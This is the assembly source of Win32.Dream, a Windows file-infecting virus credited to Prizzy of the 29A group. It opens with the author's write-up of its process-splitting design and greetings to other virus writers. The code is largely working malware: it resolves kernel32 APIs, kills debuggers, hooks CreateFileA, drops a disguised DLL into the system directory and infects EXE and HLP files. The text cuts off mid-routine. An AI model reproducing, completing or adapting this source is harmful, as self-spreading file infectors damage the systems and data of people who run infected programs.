; ; ÚÄÄÍÍÍÍÍÍÍÍÄÄÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ÄÄÍÍÍÍÍÍÍÍÄÄ¿ ; : Prizzy/29A : Win32.Dream : Prizzy/29A : ; ÀÄÄÍÍÍÍÍÍÍÍÄÄÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙÄÄÍÍÍÍÍÍÍÍÄÄÙ ; ; Hello people, here is my third virus especially when it is designed for ; whole Win32 platform. It infects only EXE (PE - Portable Executable) ; files and also HLP (Windows Help File Format). ; ; When infected EXE file is started, EIP goes through my easy polymorphic ; engine, which isn't so important in this virus, then hooks CreateFileA ; function, installs itself into memory and only then it can put EIP to ; the host - there're two returns, one for EXE the other for HLP files. ; ; With might and mind I wanted to use only it the best from new high-tech ; vx methods we know. And I think is nothing worst than virus equipped of ; interprocess communication (IPC). I also changed my coding style and ; this source is most optimization as I could. ; ; ; Detailed Information ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; ; ; 1. Interprocess Communication (IPC) ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; You could see one IPC virus (Vulcano) by Benny/29A but I used this fea- ; ture other way than he. His IPC virus is only in one process and it can ; communicate with others viruses in another process. ; ; The parts of my Win32.Dream virus work in several processes and in fact ; it behades like one whole virus. After installing to memory, virus will ; remove itself from memory of the infected program. ; ; ; 1.1. Creating processes ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; This virus is divided into seven 'independent' functions which have own ; process. To create new process I would build a dropper and via the Cre- ; ateProcessA I would run them. ; ; The dropper wait than new function for its process is ready, if yes, it ; shares two mapped blocks (OpenFileMappingA) for that process (it's Glo- ; bal memory and Function's body) and creates thread on the function. The ; process can't terminate it can only Sleep. All created processed are ; hiden in Windows 95, not in WinNT/2k (is't more complex). ; ; ; 1.2. IPC in action ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Hooked CreateFileA functions retrieves control, sets flag for certain ; process and awakes its. That process finishes own task and returns re- ; sults. ; ; ; 1.3. Global memory ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; It's necessary to share some important information among all processes. ; There are: ; ; + [thandle] : When the dropper will create new thread here is re- ; turned handle. It indicates the thread's errorcode. ; + [th_mempos] : Here is stored the name of the Function's mapped ; object. The dropper will open that memory area. ; + [process] : hProcess, ProcessID values of the all created pro- ; cesses because of opening/runing them. ; + [apiz] : The addresses of the all APIz I call are on this ; place. ; + [active] : If other process wants to run me, sets certain flag ; here and the thread tests it. ; + [paramz] : This is place where the virus store some parameters ; among processes (see below). ; + [vbody] : Here is the copy of the virus, useful for changing ; values inside and for poly engine. ; + [filename] : The future infected filename. New CreateFileA func- ; tion stores the name here. ; + [cinfected] : Two FPU memory buffers, one for creating of the in- ; fection mark the other for checking. ; + [poly_vbody] : Output from polymorphic engine. ; ; ; 1.4. Parameters ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; As I wrote above I have to get some parameters of the input processes. ; Here is the description of them: ; ; + [1st param] : Out of polymorhpic engine, the new size of the virus ; + [2nd param] : Filesize for checksum (+poly size yet). ; + [3rd param] : The name of the mapped file (for OpenFileMappingA). ; + [4th param] : a. Filesize for check_infected (without poly size). ; b. Out of checksum. ; + [5th param] : Input for check_infected, if '1', then it wants to ; get an angle for create_infected. ; + [6th param] : Terminate all processes ? (WinNT/2000 only) ; + [7th param] : Terminate all processes ? (Win95/98 only) ; (because of Win95/98 kernel bug) ; ; ; 1.5. Termination of the all processes ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; I remember it was a nut for me but of course I'd to solve it. At first ; I changed flags of the process (SetErrorMode, it means, the process 'll ; not show any message box if it will do bad instructions), then I had to ; check if the host lives yet. In Win95/98 I have discovered a kernel bug ; so that I couldn't use WinNT version (OpenProcess) to check if the host ; still exists because Win95/98 don't delete its process id handle. ; Win95 - you can only read some value the from allocated memory by host. ; WinNT - that allocated memory is opened by other process, you can't ; identify if the host still exists. ; ; ; 1.6. The scheme of the all processes ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; ; ; ÉÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ» ; ³ new CreateFileA API function ³ ; ÈÍÄÄÄÄÑÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄͼ ; ³ ; ÉÍÄÄÄÄÄÄÄÄÄÄÄÄÍ» ; ³ infect file ³ ÉÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ» ; ÈÍÄÑÄÄÄÄÄÄÄÄÄÄÄͼ ÚÄÄÄ infect HLP ³ ; ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÈÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄͼ ; ³ ; ³ ÉÍÄÄÄÄÄÄÄÄÍ» ; ³ º º ÚÄÄ [check_infected] ; ³ ³ ÃÄÄÄÄÄÄÄÙ ; ³ ³ infect ÃÄÄÄÄÅÄÄÄÄÄÄ [poly_engine] ; ÀÄÄÄ ³ ³ ; ³ EXE ÃÄÄÄÄÅÄÄÄÄÄÄ [create_infected] ; ³ ÃÄÄÄÄÄÄÄ¿ ; º º ÀÄÄ [checksum] ; ÈÍÄÄÄÄÄÄÄÄļ ; ; ; 2. Optimalization and comments ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Sometimes I heard my last virus Win32.Crypto is too huge and also some ; people had a fun from me (benny, mort - gotcha bastards!) that my next ; virus will be bigger than one megabyte. I wanted to optimize next one ; and I've not told them it so I think it'll be surprise for them I pro- ; ved. Nevertheless I've a taste of the second side and now I can return ; myself without any major problems. But now I can say the virus is more ; optimization than benny's bits and pieces. The source code is not com- ; mented enough because I think no many people will taste something like ; IPC is. If yes, they can contact me. ; ; ; 3. Check infected routine ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Long ago in Win32.Crypto I tasted to use unique math technique how to ; check if the file is infected. Now I thought up new more complex way. ; At first from infected file I'll compile the equation, for example: ; y = 32*x^7 + 192*x^3 - 8212*x^5 - 72*x ; and I'll get two points on that curve, for example x1=4 and x2=7. Then ; I will calculate what angle is between the tangents to the curve from ; that two points, it means: I have to calculate derivation y' of that ; equation and if I know y=x1 and y=x2 then I will determine: ; & = arc tg | log(x1 - x2) - log(1 + x1*x2) | ; If the angle will be greater e.g. than 75 degree, file is infected. ; ; This algorithm has been coded only for fun so that I know we've easier ; methods but I couldn't call to remembrance on any. ; ; ; 4. Pearls behind the scene ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; * Only two weeks before release I've think the virus name up at last. ; * At a time, during coding, I stopped writing and this virus I haven't ; coded for two months. Later when I started again I couldn't remember ; what that code does and so on. ; * In present exists over than fifty backup copies. ; * The worst part of the virus was the dropper, there were many changes ; because of Win9x and WinNT compatibility; many bugs were there. ; * After a hour of the coding I unwillingly deleted new version. So that ; I'd to save more than one gigabytes from FAT32 on another hard disk. ; Only there I found that lost version. ; * The best thing I like on the whole virus is main comment. ; * Working directory was 'E:\X_WIN\' and this file name was 'WIN.AS!'. ; * Last week I was looking for help on mirc ; i used also OpenFileMapping, but I think yes; if ... ; mmm ; OpenFileMapping? ; yes :) ; i've never used it [bumble~1.log, 18:59:17] ; ...but much help I haven't found there (although Bumblebee helped ; me with another bug). ; * During whole coding I've read five books and three film scripts. ; ; ; 5. List of greetings ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Darkman The master of the good optimistic mood ; Bumblebee Thanks for your help during coding ; Billy Belcebu So, our communication has started yet ; GriYo All the time busy man ; Lord Julus Waiting for your new virus and its meta engine ; Mort So did you think this source will be bigger then ; one megabytes? Sorry, maybe later :). ; J.P. I look forward on future with you, dude. ; Ratter No, no. Stop reading and let you show us what you ; are hiding inside. ; VirusBuster Here is that secret bin with savage poly engine as ; you wrote on #virus. ; Benny It the best in the end, benny. Haha, at last this ; source is optimized and you will stop to worry me. ; Thanks for all you have e'er done for me. ; ...and for flush, asmodeus, mlapse, mgl, f0re and evul. ; ; ; 6. Contact me ; ÄÄÄÄÄÄÄÄÄÄÄÄÄ ; prizzy@coderz.net ; http://prizzy.cjb.net ; ; ; (c)oded by Prizzy/29A, June 2000 ; ; .486p .model flat,STDCALL locals include include\mz.inc include include\pe.inc extrn ExitProcess:proc extrn CreateFileA:proc extrn MessageBoxA:proc ;ÄÄÄ´ prepare to program start ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ .data db ? .code ;ÄÄÄ´ virus code starts here ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ vstart proc pusha call $+5 pop ebp sub ebp,$-vstart-1 ;get delta vsize equ file_end - vstart mov eax,[esp+vsize+32] sub eax,1000h inf_ep equ $-4 mov [ebp+ha_module-vstart],eax add eax,fg0 - vstart + 1000h org_ep equ $-4 ;get startup address push eax call get_k32_apis jmp __return @anti_e: call kill_st call check_resident ;try to create it call create_process_maps .if byte ptr [ebp+error-vstart] == 0 call hookapi .endif __return: pop dword ptr [esp+28] popa sub esp,-vsize-4 db 90h,90h jmp eax ;exe back xor eax,eax ;hlp back ret 8 vstart endp get_k32_apis proc push 20 mov eax,[esp+vsize+48] ;find k32 address sub ax,ax pop ecx @@1:.if word ptr [eax] != 'ZM' sub eax,65536 loop @@1 jmp gk32a_f_a .endif cmp byte ptr [ebp+__return+11-vstart],90h jz $+5 pop eax jmp __return push eax eax ;get k32 tables add eax,[eax+60] pop ebx edi add ebx,[eax+78h] mov cl,0 @@3:push ebx ecx mov edx,[ebx+32] add edx,edi @@4:mov esi,[edx] ;calculate next crc32 func. add esi,edi push ecx edx ebx ;crc32 algorithm stc sbb ecx,ecx mov edx,ecx @@4_crc32_nByte: sub eax,eax sub ebx,ebx lodsb xor al,cl mov cl,ch mov ch,dl mov dl,dh mov dh,8 @@4_crc32_nBit: shr bx,1 rcr ax,1 jnc @@4_crc32_no xor ax,08320h xor bx,0edb8h @@4_crc32_no: dec dh jnz @@4_crc32_nBit xor ecx,eax xor edx,ebx cmp byte ptr [esi-1],0 jnz @@4_crc32_nByte @@4_crc32_fin: not edx not ecx pop ebx mov eax,edx rol eax,16 mov ax,cx pop edx ecx cmp [ebp+k32_crcs+ecx*4-vstart],eax ;crc32 == my func ? jz @@5 sub edx,-4 jmp @@4 gk32a_f_a: jmp gk32a_f @@3_a: jmp @@3 @@5:sub edx,[ebx+32] ;get addr of the new func. sub edx,edi shr edx,1 add edx,[ebx+36] add edx,edi movzx edx,word ptr [edx] shl edx,2 add edx,[ebx+28] mov edx,[edx+edi] add edx,edi pop ecx ebx movzx eax,word ptr [ebp+ecx*2+k32_addrs-vstart] neg ax mov [ebp+eax],edx ;store its @@5a:inc ecx mov eax,edi rol eax,8 sub al,0BFh jz @@5b cmp ecx,14 jz @@5a @@5b:cmp ecx,count jnz @@3_a push p_number+1 ;update Sleep function pop ecx @@6:movzx eax,word ptr [ebp+process_maps+ecx*2-vstart-2] neg ax mov [ebp+eax+2],edx @@7:loop @@6 test al,0C3h gk32a_f equ $-1 pop eax push cs ;anti-emulator lea eax,[ebp+@anti_e-vstart] push eax retf get_k32_apis endp kill_st proc call @sNT+10 @s95:db '\\.\SICE',0 ;name drivers @sNT:db '\\.\NTICE',0 pop ebx call open_file ;open SoftICE 95/98 or jz @ks_nt ; SoftICE NT/2k driver dec eax push eax mov eax,0 lpCloseHandle equ $-4 call eax jmp @ks_kill ;kill process @ks_nt: sub ebx,@s95-@sNT ;open the second driver call open_file jz @ks_dos dec eax call [ebp+lpCloseHandle-vstart] @ks_kill: push eax mov eax,0 lpExitProcess equ $-4 call eax @ks_dos: cmp dword ptr fs:[32],0 ;TD32 etc. jnz @ks_kill ret open_always_file: sub eax,eax ;create file always push eax ;useful for droppers mov cl,80h push ecx 2 jmp $+8 open_file: sub eax,eax ;open file in ebx push eax edx 3 cdq mov dl,0C0h bswap edx push eax eax edx ebx mov eax,0 lpCreateFile equ $-4 call eax inc eax ret kill_st endp check_resident proc push ebp 1 0 ;create mutex or get if it mov eax,0 ;has been created => in mem lpCreateMutexA equ $-4 call eax xchg eax,ebx mov eax,0 lpGetLastError equ $-4 call eax xchg eax,esi or esi,esi jz @cr_f push ebx mov eax,0 lpReleaseMutex equ $-4 call eax @cr_f:or esi,esi pop eax jnz __return jmp eax check_resident endp create_process_maps proc mov byte ptr [ebp+error-vstart],1 call build_dropper ;create dropper in sys dir jc cpm_fnodeal mov eax,0 lpGetCurrentProcessId equ $-4 call eax mov [ebp+if_parent-vstart],eax sub ebx,ebx push 80h cpm_shared_mem equ $-4 push 7 mov eax,0 lpSetErrorMode equ $-4 call eax pop ecx lea edi,[ecx+vbody] push ecx mov esi,ebp mov ecx,vsize rep movsb cpm_nxproc: pop eax lea edi,[eax+8+ebx*8] push eax mov [eax],edi call @@1 dd 0,0,0,0 ;hProc, hThr, ProcID, ThrID @@1:pop esi lea eax,[ebp+vsize] push esi eax 68 pop ecx @@1a:mov [eax],ch inc eax loop @@1a push ecx ecx 640 1 ecx ecx 80h ecx cpm_cmdline equ $-5 inc ecx mov dword ptr [eax-6*4],ecx mov eax,0 lpCreateProcessA equ $-4 call eax or eax,eax jz cpm_failed lodsd ;get hProcess and ProcessID stosd lodsd lodsd mov edx,eax stosd movzx esi,word ptr [ebp+process_maps+ebx*2-vstart] neg si add esi,ebp movzx ecx,word ptr [esi-2] mov eax,4096 call malloc xchg eax,edi rep movsb ;copy one to mem pop esi push esi movzx eax,byte ptr [ebp+m_sign-2-vstart] mov [esi+4],eax ;thread memory sign mov [esi],ecx ;active flag push esi count-2 lea edi,[esi+apiz] lea esi,[ebp+k32_addrs-vstart] pop ecx @@2:sub eax,eax lodsw neg ax mov eax,[ebp+eax] stosd loop @@2 pop esi push edx ecx 1F0FFFh mov eax,0 lpRegisterServiceProcess equ $-4 or eax,eax jz cpm_winnt push 1 edx call eax cpm_winnt: mov eax,0 lpOpenProcess equ $-4 ;create inside thread from call eax ;the dropper xchg eax,ecx jecxz cpm_failed mov edx,0 lpWaitForSingleObject equ $-4 call edx, ecx, 40 lodsd not eax xchg eax,ecx jecxz cpm_failed inc ebx cmp bl,p_number jnz cpm_nxproc mov al,bh ;remove the virus from the mov ecx,(mem_end - newCreateFile) ;current file, live on the lea edi,[ebp+newCreateFile-vstart] ;other places inside win32 rep stosb mov byte ptr [ebp+error-vstart],cl cpm_failed: pop eax or ebx,ebx jnz cpm_fnodeal call mdealloc cpm_fnodeal: mov eax,[ebp+cpm_cmdline-vstart] mdealloc: push eax ;deallocate shared memory mov eax,0 lpUnMapViewOfFile equ $-4 call eax ret error db 0 create_process_maps endp build_dropper proc mov eax,260 ;generate dropper filename call malloc mov [ebp+cpm_cmdline-vstart],eax mov edi,eax push 7Fh eax ;no more then 0x80 chars mov eax,0 lpGetSystemDirectory equ $-4 call eax ;get system directory or eax,eax jz bd_failed call bd_fname db '\mshrip32.dll',0 ;hmmm, my dropper name bd_fname: pop esi push 14 mov ebx,edi add edi,eax pop ecx rep movsb call open_always_file ;create its jz bd_failed dec eax push eax mov esi,1024 ;alloc memory for dropper call malloc xchg eax,edi ;edi=output, all is zero mov eax,60000 push edi lea esi,[ebp+dropper_data-vstart] call malloc xchg ebx,eax mov [ebp+cpm_shared_mem-vstart],ebx mov eax,0 lpGetVersion equ $-4 call eax xor ecx,ecx bt eax,63 adc edi,ecx mov [ebx+paramz+(7-1)*4],edi pop edi push edi mov al,[ebp+m_sign-2-vstart] mov [esi+224],al ;noone knows what is it bd_read: ;create EXE PE dropper xor eax,eax lodsb cmp al,-1 ;end of data? jz bd_done add edi,eax ;next movement lodsb xchg eax,ecx bd_write: lodsb stosb ;save data loop bd_write jmp bd_read E8 equ 0E8 bd_done: push 0 call @@2 dd ? @@2:push 1024 push dword ptr [esp+12] ;droppers body push dword ptr [esp+20] ;file handle mov eax,0 lpWriteFile equ $-4 call eax push eax dword ptr [esp+8] call [ebp+lpCloseHandle-vstart] pop ecx eax eax ;write error ? jecxz bd_failed test al,0F9h bd_failed equ $-1 ret radix 16 ;compressed [dropper EXE(PE) 1024 bytes] dropper_data equ this byte db 0,5,4Dh,5A,90,0,3,3,1,4,3,2,0FF,0FF,2,1,0B8,7,1,40,23,1,0C0,83,2 db 50,45,2,8,4C,1,1,0,7F,6A,4,38,8,7,0E0h,0,0Fh,1,0Bh,1,6,6,1,2,6,2 db 0C,10,3,1,10,3,1,10,4,1,40,2,1,10,3,1,2,2,1,4,7,1,4,8,1,20,3,1,2 db 2,2,0E6,3Bh,2,1,2,5,1,10,2,1,10,4,1,10,2,1,10,6,1,10,0Bh,2,88,10 db 2,1,28,54,1,10,2,1,8,1Bh,4,2Eh,32,39,41,4,1,0C8,4,1,10,3,1,2,3,1 db 2,0E,1,40,2,1,0C0,20,2,0B8h,10,0A,7E,0E8,45,0,0,0,96,0E8,0,0,0,0 db 5Dh,89,75,9,0EBh,2,90,90,0BBh,0,0,0,0,83,3Bh,0,75,1E,66,0C7,45,6 db 0EBh,28,0E8,1E,0,0,0,33,0C9,53,51,53,50,51,51,0B8,0,0,0,0,-1,0D0 db 0F7,0D0,89,3,6A,0A,0B8,0,0,0,0,0FF,0D0h,0EBh,0CBh,0ADh,56,0EBh,7 db 0E8,2,0,0,0,41,0,33,0F6,0BF,1F,0,0F,0,6A,1,57,0B8,0,0,0,0,-1,0D0 db 56,56,56,57,50,0B9,0,0,0,0,-1,0D1,0C3,E8,0,0,0,0,-1,25,0,10,40,0 db 0,0,0B0,10,0A,2,0BEh,10,3,1,10,16,2,0B8,10,6,0Fh,96,1,50,69,65,0 db 47,44,49,33,32,2E,64,6C,6C,0FF radix 10 build_dropper endp malloc proc pusha ;allocate shared memory xchg ebx,eax sub esi,esi inc byte ptr [ebp+m_sign-2-vstart] call m_sign db "@",0 m_sign: push ebx esi 4 esi 0-1 mov eax,0 lpCreateFileMappingA equ $-4 call eax dec eax jz m_failed inc eax push ebx esi esi 2 eax mov eax,0 lpMapViewOfFile equ $-4 call eax m_failed: mov [esp+28],eax popa or eax,eax ret malloc endp hookapi proc mov ebx,0 ha_module equ $-4 cmp word ptr [ebx],'ZM' jnz ha_failed movzx esi,word ptr [ebx+60] add esi,ebx cmp word ptr [esi],'EP' jnz ha_failed mov eax,[esi+80h] add eax,ebx fk32:mov esi,eax mov esi,[esi+12] cmp [esi+ebx],'NREK' jz fkok sub eax,-20 jmp fk32 fkok:mov edx,[eax+16] add edx,ebx cmp dword ptr [eax],0 jz ha_failed push edx mov esi,[eax] add esi,ebx mov edx,esi sub eax,eax fklp:cmp dword ptr [edx],0 jz ha_failed2 cmp dword ptr [edx+3],80h jz finc mov esi,[edx] lea esi,[esi+ebx+2] call fnam db "CreateFileA",0 fnam:pop edi fcom:push 12 pop ecx repe cmpsb jecxz fapi finc:inc eax sub edx,-4 jmp fklp fapi:shl eax,2 add eax,[esp] xchg ebx,eax mov eax,[ebx] mov ecx,[ebp+cpm_shared_mem-vstart] mov [ecx+vbody+newCreateFile+1-vstart],eax lea eax,[ecx+vbody+newCreateFile-vstart] mov [ebx],eax pop ecx ret ha_failed2: pop eax ha_failed: pop eax jmp __return hookapi endp db " Win32.Dream, (c)oded by Prizzy/29A ",13,10 db " The greetz go to all 29A vx coderz ",13,10 newCreateFile proc push 80h oldCreateFile equ $-4 pusha call $+5 pop ebp sub ebp,$-vstart-1 mov ebx,[ebp+cpm_shared_mem-vstart] lea edi,[ebx+vbody+vsize] mov word ptr [edi-vsize+__return+11-vstart],9090h mov esi,[esp+7*4+12] ncfc:lodsb stosb or al,al jnz ncfc lea edi,[ebx+active] lea esi,[ebx+process] ;infect_file hProcess, ProcID lodsd xchg ebx,eax lodsd mov byte ptr [edi],1 ;active thread push eax 0 1F0FFFh call [ebp+lpOpenProcess-vstart] xchg eax,ecx jecxz ncf_failed ncfw:push 40 ebx call [ebp+lpWaitForSingleObject-vstart] cmp byte ptr [edi],0 jnz ncfw ncf_failed: popa ret newCreateFile endp start_thread macro thread pusha ;threads gdelta push 80h ;Sleep function call $+5 pop ebp sub ebp,$-thread-1 mov esi,[esp+40] IFE st_count NE 0 if_shared_mem equ $-4 push 80h 0 1F0FFFh if_parent equ $-11 call [esi+apiz+12*4] ;OpenProcess xchg eax,esi xchg eax,ebx or esi,esi jnz $ + 11 ;terminate all processes inc esi mov [ebx+paramz+(6-1)*4],esi jmp ifex push esi call [ebx+apiz+1*4] ;CloseHandle mov esi,ebx ELSE push 1 pop edi cmp [esi+paramz+(6-1)*4],edi ;terminate this process? jnz $ + 4 jmp edi ENDIF mov eax,[esi+paramz+(7-1)*4] test al,1 jz $ + 4 mov al,[eax] lea edi,[esi+active+st_count] push edi cmp byte ptr [edi],0 jz @@end endm st_count = 0 end_thread macro thread st_count = st_count + 1 mov edi,[esp] mov byte ptr [edi],0 @@end:pop edi eax ;sleep function call eax, 2 popa ;don't terminate jmp thread endm dw check_infected-infect_file infect_file proc start_thread infect_file lea esi,[ebx+vbody+vsize] ifex:lodsb cmp al,'.' jnz ifex dec esi lodsd or eax,20202020h mov ebx,[esp+44] lea edi,[ebx+active+4] lea esi,[ebx+process+8*4] ;infect_exe hProcess, ProcID cmp eax,'exe.' jz if_2 cmp eax,'plh.' jnz if_failed if_call_hlp: sub esi,8 ;infect_hlp dec edi if_2:lodsd push eax lodsd mov byte ptr [edi],1 ;active infect_exe (_hlp) push eax 0 1F0FFFh call [ebx+apiz+4*12] ;OpenProcess xchg eax,ecx jecxz if_failed - 1 if_r:pop eax push eax 40 eax call [ebx+apiz+4*13] ;WaitForSingleObject cmp byte ptr [edi],0 jnz if_r pop eax if_failed: end_thread infect_file infect_file endp dw create_infected-check_infected check_infected proc start_thread check_infected xchg ebx,esi xor esi,esi cmp [ebx+paramz+(5-1)*4],1 jz ci_nomem other_process_mem macro shared_mem, param ;get mem from other process call $ + 7 db "1",0 push 1 4 call [shared_mem+apiz+24*4] ;OpenFileMappingA xor ecx,ecx push eax ecx ecx ecx 4 eax call [shared_mem+apiz+7*4] ;MapViewOfFile push eax xchg eax,esi endm other_process_mem ebx, 4 ci_nomem: add esi,[ebx+paramz+(4-1)*4] mov ecx,[esi-4-tbyte] ;number of the terms in a or ecx,ecx ;equation jz ci_failed cmp ecx,8 jnbe ci_failed sub esp,128 fsave [esp] push ecx imul ecx,-(tbyte+tbyte) sub ecx,tbyte+tbyte+4+tbyte lea esi,[esi+ecx] ;data starts here lea edi,[ebx+vbody+vsize+260] cmp [ebx+paramz+(5-1)*4],1 jnz $ + 8 lea edi,[ebx+vbody+vsize+260+ci_size/2] neg ecx push edi rep movsb pop esi ecx push ecx esi fld tbyte ptr [esi+tbyte] ;derivation of the equations fld st(0) ;you'll get two tangents fld tbyte ptr [esi] fmul fld1 fsubp st(2),st fstp tbyte ptr [esi] fstp tbyte ptr [esi+tbyte] sub esi,-(tbyte+tbyte) loop $ - 21 pop esi ecx sub esp,tbyte+tbyte fldz fldz fstp tbyte ptr [esp] fstp tbyte ptr [esp+tbyte] push esi ecx imul eax,[esp],tbyte+tbyte ;involution of the equations fld tbyte ptr [esi] fld tbyte ptr [esi+tbyte] fld tbyte ptr [esi+eax+tbyte] fld tbyte ptr [esi+eax] fld st(2) fld st(4) fxch st(2) lea edx,[ebp+($+32)-check_infected] push edx fyl2x ;over natural logarithm fld st(0) frndint fsubr st(1),st fxch fchs f2xm1 fld1 faddp fscale fstp st(1) fmul ret fld tbyte ptr [esp+tbyte+2*dword] faddp fstp tbyte ptr [esp+tbyte+2*dword] call $ - 35 ;we've two points on the curve fld tbyte ptr [esp+2*dword] faddp fstp tbyte ptr [esp+2*dword] sub esi,-(tbyte+tbyte) dec dword ptr [esp] ;next term in the equation jnz $ - 85 pop ecx ecx fld tbyte ptr [esp+tbyte] ;calculate an angle of the fld tbyte ptr [esp] ;two tangents of the equation fld st(1) fld st(1) fsub fxch st(2) fmul fld1 fadd fdiv fabs fld1 fpatan push 180 ;radian -> angle fimul dword ptr [esp] fldpi fdiv pop eax sub esp,-(tbyte+tbyte) mov eax,2*tbyte+dword cmp dword ptr [ebx+paramz+(5-1)*4],1 jnz $ + 12 sub eax,-(dword-ci_size/2) fld st(0) fstp tbyte ptr [esi+eax] fld tbyte ptr [esi+eax] fsub sub esp,tbyte fstp tbyte ptr [esp] cmp dword ptr [esp+tbyte-dword],0 ;compare the results lahf sub esp,-tbyte wait fnrstor [esp] sub esp,-128 sahf jnz ci_failed push 1 pop eax mov [ebx+paramz+(4-1)*4],eax jmp ci_finish ci_failed: xor eax,eax mov [ebx+paramz+(4-1)*4],eax ci_finish: cmp [ebx+paramz+(5-1)*4],1 jz $ + 8 call [ebx+apiz+8*4] ;UnMapViewOfFile call [ebx+apiz+1*4] ;CloseHandle end_thread check_infected check_infected endp dw infect_hlp-create_infected create_infected proc start_thread create_infected lea edi,[esi+vbody+vsize+260] push edi stosd call $ + 241 ;number of the terms in a shr eax,29 ;equation xchg eax,ecx inc ecx push ecx sub esp,128 fnsave [esp] call $ + 221 ;generate a multiplier (+/-) sub edx,edx mov ebx,100000 div ebx or edx,edx jz $ - 16 fld1 rcr eax,1 jc $ + 4 fchs push edx fimul dword ptr [esp] fstp tbyte ptr [edi] pop edx sub edi,-tbyte call $ + 119 ;generate an exponent loop $ - 41 ;next term in the equation inc ecx inc ecx call $ + 110 ;two points on the curve loop $ - 5 fnrstor [esp] sub esp,-128 pop eax stosd lea ecx,[edi+tbyte] sub edi,[esp] xchg eax,edi pop edi stosd pusha ;calculate an angle, it mov ebx,esi ;means: call other process mov [esi+paramz+(4-1)*4],ecx mov [esi+paramz+(5-1)*4],1 lea edi,[esi+active+1] lea esi,[esi+process+1*8] lodsd push eax lodsd mov byte ptr [edi],1 push eax 0 1F0FFFh call [ebx+apiz+4*12] ;OpenProcess pop esi push 40 esi call [ebx+apiz+4*13] ;WaitForSingleObject cmp byte ptr [edi],0 jnz $ - 9 popa mov [esi+paramz+(5-1)*4],0 end_thread create_infected call $ + 66 ;generate an exponent sub edx,edx push 11 pop ebx div ebx or edx,edx jz $-14 push edx fild dword ptr [esp] call $+15 dt 3FEB8637BD05AF6C69B6r pop eax ebx fld tbyte ptr [eax] xchg ebx,eax cdq call $ + 25 mov ebx,1000000 div ebx push edx fimul dword ptr [esp] fsub fstp tbyte ptr [edi] pop eax sub edi,-tbyte ret mov eax,0 ;get a random value lpGetTickCount equ $-4 call eax add eax,80h push ecx 33 pop ecx add eax,eax jnc $ + 4 xor al,197 loop $ - 6 mov [ebp+($-16)-create_infected],eax pop ecx ret create_infected endp dw infect_exe-infect_hlp infect_hlp proc start_thread infect_hlp sub esp,16 sub ebx,ebx mov word ptr [esi+vbody+__return+11-vstart],02EBh lea eax,[esi+vbody+vsize] push ebx 80h 3 ebx ebx 0c0000000h eax call [esi+apiz+4*0] ;open file inc eax jz ih_failed dec eax push eax mov bh,80h push ebx 40h mov eax,0 lpGlobalAlloc equ $-4 call eax ;GlobalAlloc mov [esp+4],eax xchg eax,esi push 16 pop ecx sub edx,edx call read jc ih_free lodsd cmp eax,35f3fh ;hlp signature jnz ih_free lodsd lea edx,[eax+55] ;directory offset mov ecx,512 lodsd lodsd call read ih_search: dec ecx jz ih_free cmp dword ptr [esi+ecx],'SYS|' jnz ih_search cmp dword ptr [esi+ecx+4],'MET' jnz ih_search mov eax,[esi-4] xchg eax,[esi+ecx+8] xchg eax,edx push 21 sub esi,-512 pop ecx call read lodsd push 21 pop ecx sub eax,ecx add edx,ecx mov [esp+4+4],edx mov [esp+8+4],eax mov edi,[esp+4] sub edi,-549 lea esi,[ebp+hlp1_s-infect_hlp] lea eax,[edi+size-hlp1_s] mov [esp+12+4],eax push hlp1_e-hlp1_s pop ecx rep movsb push edi mov ebx,[esp+40+16+8+4] lea esi,[ebx+vbody] push esi sub esi,-vsize ih_next: sub esi,4 mov eax,[esi] call ihck or edx,edx jnz ihex mov al,68h stosb mov eax,[esi] stosd jmp ihdn ihex:mov al,0b8h stosb mov eax,[esi] xor eax,edx stosd mov al,53 stosb mov eax,edx stosd mov al,80 stosb ihdn:cmp [esp],esi jnz ih_next jmp ihcn ihck:call ihcv jc iha1 sub edx,edx ret iha1:mov ebx,eax ihax:mov eax,ebx call $+9 dd 12345678h pop edx sub [edx],12345678h org $-4 rnd dd 87654321h mov edx,[edx] xor 